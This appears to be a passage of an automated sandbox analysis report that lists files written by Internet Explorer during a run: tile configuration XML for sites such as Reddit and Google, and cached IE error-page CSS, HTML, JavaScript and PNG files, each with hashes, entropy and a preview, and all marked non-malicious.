SHA-512:	1B765EBA71145EDB3B31569A4208AC3922E7DC484D006564BD6A11D2935DF2805967AE9A72A4FFC9AEFE693ED2BDDA6E08AF2D8C4F9632AAC7DF8343C620BB18
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1405293489180375
Encrypted:	false
SSDEEP:	12:TMHdNMNxxwWubmWubpnWimI002EtM3MHdNMNxxwWubmW2vnWimI00Ob6Kq5EtMb:2d6Nx9uISZHKd6Nx9ucSZ7ob
MD5:	F10D9015D97537E4CC5CA07F9145B361
SHA1:	87D64C880746B28A387A235D0C452AD04695606A
SHA-256:	6A4B68122EAAAD5791D23E9EBB567BFEDECE7E59678C06927B79806494D7BE71
SHA-512:	3402E6938902C99946EB10A06B7F3F7096DAA26BC6A102948F8BD94A66A7801E136773FE28958C25FA4782A4C0ACA676BDD560EE540A38669073A80FDDC0213A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.151946553913353
Encrypted:	false
SSDEEP:	12:TMHdNMNxcwaraUnWimI002EtM3MHdNMNxcwaraUnWimI00ObVEtMb:2d6NxEWUSZHKd6NxEWUSZ7Db
MD5:	C7A54905E71A510F14BCF92F140F4B33
SHA1:	EF490F8F776D5EC96F24A812857189DCBB22E26C
SHA-256:	700B1C3E36713F75D4780CF4C6B26E96E4FC9C0FE5DABE2E500A8E6DF0DC3D3E
SHA-512:	3F3A6788B5AA51FFF8655081378F6337CA4F0B56FA69BE12DB86FC938D3578DE51ECBB2C2064A6E7E4F6DE4ED3A70EC7E6E4DF19B2A2488D8EDC3FEBEB0CBE39
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.098166801838891
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnwWubmWubpnWimI002EtM3MHdNMNxfnwWubmWubpnWimI00Obe5EtMb:2d6NxruISZHKd6NxruISZ7ijb
MD5:	55EA94A0B770ACED3BB3C2E5E706F369
SHA1:	985BB78AC79E5CB7A82A3063C43B690C5C9F897C
SHA-256:	0F222996F521DB45250C4E5DC59ADD173AEE6A22B223D50AE850057883A9679A
SHA-512:	0DB107D21BEC4550AE97540E12152C33AE1EA4D93681D2F6976FF4235C69C88D57ECF4523F3DF84D2725913403ABCAB83299EE9BCDB5733E07C32B8347213A83
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
